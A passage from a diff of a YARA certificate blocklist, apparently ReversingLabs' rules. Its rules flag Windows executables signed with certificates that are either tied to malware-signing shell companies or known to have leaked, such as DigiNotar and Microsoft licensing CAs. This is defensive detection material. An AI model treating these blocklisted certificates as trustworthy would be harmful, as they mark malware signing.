"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6752-L6770" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4193fce69af03b3521a3cc442b762c52f8585b44fa6b0bd78b9ace171b807ed4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L837-L853" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6f2f3f3ae009fbb9ebe589fc6b640be89c4a7b734eda515f182c7e9c9ffb4779" score = 75 quality = 90 tags = "INFO, FILE" @@ -9862,22 +29653,22 @@ rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YUTAKS, OOO" and (pe.signatures[i].serial=="00:7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" or pe.signatures[i].serial=="7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d") and 1599611338<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar PKIoverheid CA Overheid" and pe.signatures[i].serial=="01:31:44:76" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_013169B0 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "1e5a2708-2875-50ab-af6b-3be91f38e13f" + id = "a5f68c0a-635a-5aa9-94d2-7628999f06c2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6772-L6788" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6b62d5c7a3c6e3096797cd2f515d86045fa77682638bda44175d05c5b6c5bbc0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L855-L871" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "354421ebad7fd0b73c9ba63630c91d481901ca9ec39be3c6b66843221e4b5aad" score = 75 quality = 90 tags = "INFO, FILE" @@ -9887,22 +29678,22 @@ rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bespoke Software Solutions Limited" and pe.signatures[i].serial=="04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" and 1597971601<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar PKIoverheid CA Overheid en Bedrijven" and pe.signatures[i].serial=="01:31:69:b0" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C76Da9C910C4E2C9Efe15D058933C4C : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "1e61a781-d5fb-5f05-81c4-3cc697ece13c" + id = "a9b06d49-1ab2-539e-bd1f-16da40b654b2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6790-L6806" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1a55856bfa4c632b2b0404686dc7ba5e7238b619dd4d2eb68c3d291bc86e52c4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L873-L889" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "883e93bff42161ba68f69fb17f7e78377d7f3cb6b6cdf72cffb4166466f8bc7b" score = 75 quality = 90 tags = "INFO, FILE" @@ -9912,22 +29703,22 @@ rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Futumarket LLC" and pe.signatures[i].serial=="03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" and 1604036657<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA" and pe.signatures[i].serial=="0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_469C2Caf : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "574ee0d4-ba7c-5c74-b711-222f92196f4a" + id = "12d7c4a8-0a84-502a-855b-674972a2e2e1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6808-L6826" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "324de84cb8c2f5402c9326749e3456e11312828df2523954fd84f7fb3298fdf3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L891-L907" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2490dbd74a5d3eede494d284f96af835c270d2fb0752b887aadbaf92bf34e6d4" score = 75 quality = 90 tags = "INFO, FILE" @@ -9937,22 +29728,22 @@ rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Unicom Ltd" and (pe.signatures[i].serial=="00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" or pe.signatures[i].serial=="fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0") and 1603958571<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA" and pe.signatures[i].serial=="46:9c:2c:af" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_469C3Cc9 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "7a829a63-eeb4-50ef-829d-fc13572c1148" + id = "36d76a9f-d18f-56bf-b00a-f7320f04f39a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6828-L6844" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f3184a9d1fe2a1cf2dcc04d26c284aa9a651d2f00aa28642d7f951550a050138" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L909-L925" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7327b7cbeb616bc46c82975aed6b3ea1caafa74fd431e2d98ca55b00851e22c8" score = 75 quality = 90 tags = "INFO, FILE" @@ -9962,22 +29753,22 @@ rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EVATON, s.r.o." and pe.signatures[i].serial=="0e:6f:4c:b8:b0:6e:01:c3:bd:29:6a:ce:3a:95:f8:14" and 1603957781<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA" and pe.signatures[i].serial=="46:9c:3c:c9" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A82Bd1E144E8814D75B1A5527Bebf3E : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "7d27604e-4ecd-559c-9180-4914e7f1f6c9" + id = "f3d7d714-8085-524a-814c-ab8cc59ceb4f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6846-L6862" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "50ff48a421a109f8c6bf92032691d9b673945bc591005004ff17dc18c97d4aea" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L927-L943" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2534e58ce1e5adbb10dbacb664d40cc32faec341bdb93b926cc85b666cc7b77e" score = 75 quality = 90 tags = "INFO, FILE" @@ -9987,22 +29778,22 @@ rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Best Fud, OOO" and pe.signatures[i].serial=="08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" and 1597971601<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA G2" and pe.signatures[i].serial=="0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3e" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_469C2Cb0 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "ac86893f-2edd-5f1c-96eb-4cb140e8e001" + id = "dd19b988-747d-55b9-825b-2ada1ca83691" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6864-L6880" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4cd08b9113a7c1f4f2d438ac59ad0be503daded3a08b8c8e8ce3e0dfdddf259e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L945-L961" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "67ff84475cbe231f97daa3ce623689e7936db8e56be562778f8a4c1ebf7bf316" score = 75 quality = 90 tags = "INFO, FILE" @@ -10012,22 +29803,22 @@ rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "APPI CZ a.s" and pe.signatures[i].serial=="51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" and 1605299467<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Services 1024 CA" and pe.signatures[i].serial=="46:9c:2c:b0" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4C0E636A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "85639e74-80b0-59c6-b31b-5b3d9587b37a" + id = "beb2039c-3b0e-5649-96ca-40175493e62c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6882-L6900" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1416768011ff824307d112bdeecce1ad50d1f673e92bef8fddbbeb58ff98b1b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L963-L979" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "20169cf9ce3f271a22d1376bcf0ff0914f43937738c9ed61fd8e40179405136b" score = 75 quality = 90 tags = "INFO, FILE" @@ -10037,22 +29828,22 @@ rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Planeta, TOV" and (pe.signatures[i].serial=="00:b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" or pe.signatures[i].serial=="b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d") and 1603381300<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digisign Server ID - (Enrich)" and pe.signatures[i].serial=="4c:0e:63:6a" and 1320191999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_072714A9 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f941b7d6-f168-57aa-881a-54679a2b948c" + id = "15ad6936-78a4-58b1-8c68-27ec4ed38649" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6902-L6918" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "97759fa2e519936115f0493e251f9abc0cce3ada437776a5a370388512235491" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L981-L997" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8bea4cfb60056446043ef90a7d01ecc52d82d9e7005a145a4daa61a522ecd2ae" score = 75 quality = 90 tags = "INFO, FILE" @@ -10062,22 +29853,22 @@ rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rad-Grad D.O.O." and pe.signatures[i].serial=="07:b7:4c:70:c4:aa:09:26:48:b7:f0:d1:a8:a3:a2:8f" and 1603240965<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digisign Server ID (Enrich)" and pe.signatures[i].serial=="07:27:14:a9" and 1320191999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_00D8F35F4Eb7872B2Dab0692E315382Fb0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "549249df-690c-5b75-ac1a-77b509c9e163" + id = "2c051732-76d7-5562-a79e-c5bbdc8373b2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6920-L6936" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3b7b10afa5f0212bd494ba8fe32bef18f2bbd77c8ab2ad498b9557a0575cc177" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L999-L1017" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "463757c59c32859163ea80e694e1f39239c857124aad3895f22f83b47645910c" score = 75 quality = 90 tags = "INFO, FILE" @@ -10087,22 +29878,22 @@ rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DREAM SECURITY USA INC" and pe.signatures[i].serial=="4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" and 1592961292<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "global trustee" and (pe.signatures[i].serial=="00:d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" or pe.signatures[i].serial=="d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0") and 1300060800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_750E40Ff97F047Edf556C7084Eb1Abfd : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "ce10840c-150d-5ecd-ab9a-7bc96092ebfd" + id = "7ae4ba81-82be-57f9-aa8c-0e5c30e412c6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6938-L6954" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5874860582ed5be6908dca38e6ecae831eeeb0c2b768e8065ada9fd5ac2bda89" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1019-L1035" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "21c2468905514e1725a206814b0c61c576cf7f97f184bac857bca9283f49a957" score = 75 quality = 90 tags = "INFO, FILE" @@ -10112,22 +29903,22 @@ rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LTD SERVICES LIMITED" and pe.signatures[i].serial=="7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" and 1616025600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Corporation" and pe.signatures[i].serial=="75:0e:40:ff:97:f0:47:ed:f5:56:c7:08:4e:b1:ab:fd" and 980899199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1B5190F73724399C9254Cd424637996A : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "e42d2881-efda-5aa0-b455-dabbd3a77e97" + id = "dfb08450-c35c-5b7b-9d04-2c9a6af9bcf8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6956-L6974" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "43f44cbedf37094416628c9df23767be3b036519f93222812597777a146ecb24" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1037-L1053" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "08f287ccda93e03a7e796d5625ab35ef0de782d07e5db4e2264f612fc5ebaa21" score = 75 quality = 90 tags = "INFO, FILE" @@ -10137,22 +29928,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Ornitek" and (pe.signatures[i].serial=="00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" or pe.signatures[i].serial=="ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29") and 1614643200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Corporation" and pe.signatures[i].serial=="1b:51:90:f7:37:24:39:9c:92:54:cd:42:46:37:99:6a" and 980812799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_00Ebaa11D62E2481081820 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "7151fd62-7f6c-59d7-800b-65e5b4db279b" + id = "e192d271-b5de-5acc-a04f-02a26d9231ac" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6976-L6992" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a5bb946c6199cd47a087ac26f0a996261318d1830191ea7c0e7797ff03984558" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1055-L1072" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2fafc6775ec88b5a1000afbc7234fbef6b03e9eaf866dae660dd2d749996cb5c" score = 75 quality = 90 tags = "INFO, FILE" @@ -10162,22 +29953,22 @@ rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bisoyetutu Ltd Ltd" and pe.signatures[i].serial=="26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" and 1616025600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Enforced Licensing Intermediate PCA" and (pe.signatures[i].serial=="00:eb:aa:11:d6:2e:24:81:08:18:20" or pe.signatures[i].serial=="eb:aa:11:d6:2e:24:81:08:18:20")) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Aab11Dee52F1B19D056 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "12c80895-57fd-5341-b3ef-d59c25d4c234" + id = "c6334520-7f93-59d0-8a22-721b928c14d1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6994-L7010" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6e77c7d0bd7e5e9bc8880cc6ffc3f5f4f738e3dde22c270ad7a6f6672a99de53" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1074-L1089" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1f1215143dc828596e6d7eeff99983755b17eaeb3ab9d7643abdbb48e9957c78" score = 75 quality = 90 tags = "INFO, FILE" @@ -10187,22 +29978,22 @@ rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Medium LLC" and pe.signatures[i].serial=="59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" and 1609113600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Enforced Licensing Intermediate PCA" and pe.signatures[i].serial=="3a:ab:11:de:e5:2f:1b:19:d0:56") } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6102B01900000000002F : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "ec525737-9770-585e-922a-43f14e0a4a37" + id = "b98769c6-805e-5cd0-96f1-67418fec40a6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7012-L7030" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e7fbc1f32adec39c94dc046933e152cd6d3946da4a168306484b7b6bc7f26fb6" + source_url = 